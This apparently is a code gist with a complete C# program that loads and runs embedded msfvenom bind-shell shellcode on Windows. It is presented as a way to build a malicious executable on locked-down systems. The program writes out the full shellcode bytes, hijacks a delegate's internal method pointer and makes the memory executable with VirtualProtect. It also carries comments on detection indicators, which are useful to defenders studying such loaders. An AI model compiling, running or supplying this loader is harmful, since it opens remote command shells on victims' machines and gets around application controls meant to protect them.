
@kost
Created April 26, 2014 05:16
Use .NET csc.exe to create a malicious EXE on locked down systems
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace ExecASMHardcoded
{
class Program
{
// P/Invoke to kernel32 to change the protection flags of a memory region.
// Detection note: a managed process calling VirtualProtect with flNewProtect == 0x40
// (PAGE_EXECUTE_READWRITE) on an address inside one of its own byte[] objects is the
// primary behavioural indicator for this kind of loader; EDR hooks on this API
// (and on the later unbacked call) are the usual place it is caught.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
// Delegate type whose calling convention is borrowed to invoke the raw bytes below
// as though they were a managed method.
public delegate uint Ret1ArgDelegate(uint address);
// Dummy target: a delegate is created over this method only so that its internal
// method pointer can be overwritten in Main; the body is never meant to run.
static uint PlaceHolder1(uint arg1) { return 0; }
// Raw x86 machine code. The author's comment inside the initializer records it as
// msfvenom output with no encoder ("-e none"), so the bytes are a direct candidate for
// static signature / YARA matching in the compiled assembly.
public static byte[] asmBytes = new byte[]
{
//msfvenom -p windows/shell_bind_tcp -e none | sed -e ‘s/\"//ig’ | sed -e ‘s/+//ig’ | sed -e ‘s/\\x/,0x/ig’
0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,
0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,
0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,
0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,
0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,
0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,
0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,
0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x89,0xc7,0x31,
0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,
0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,
0xd5,0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x89,0xc7,
0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,
0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,
0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,
0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,
0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,
0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
0x6a,0x00,0x53,0xff,0xd5,
};
// Entry point. The steps are: pin the byte array, point a delegate's private
// "_methodPtr" field at it, flip the page to RWX, then invoke the delegate so control
// transfers into the array. Each of those steps is observable: reflection over
// System.Delegate internals, an unsafe/fixed context (the assembly must be compiled
// with /unsafe), and a VirtualProtect whose return value is never checked.
unsafe static void Main(string[] args)
{
fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
{
// Get the FieldInfo for "_methodPtr"
// NOTE(review): this depends on an undocumented CLR-internal field; a runtime that
// renames or hides it would presumably make GetField return null and the SetValue
// below throw, which is one reason this pattern is fragile across .NET versions.
Type delType = typeof(Delegate);
FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
BindingFlags.Instance);
// Set our delegate to our x86 code
Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
_methodPtr.SetValue(del, (IntPtr) startAddress);
//Disable protection
// 0x40 is PAGE_EXECUTE_READWRITE. The BOOL result is discarded: if the call is
// refused (e.g. by a memory-protection policy) the call through `del` below runs
// against a non-executable page and should fault rather than execute.
uint outOldProtection;
VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0x40, out outOldProtection);
// Enjoy
// Calls into the array via the hijacked delegate; the argument/return values are
// only meaningful to the embedded code, not to this program.
uint n = (uint)0x00000001;
n = del(n);
Console.WriteLine("{0:x}", n);
Console.ReadKey();
}
}
}
}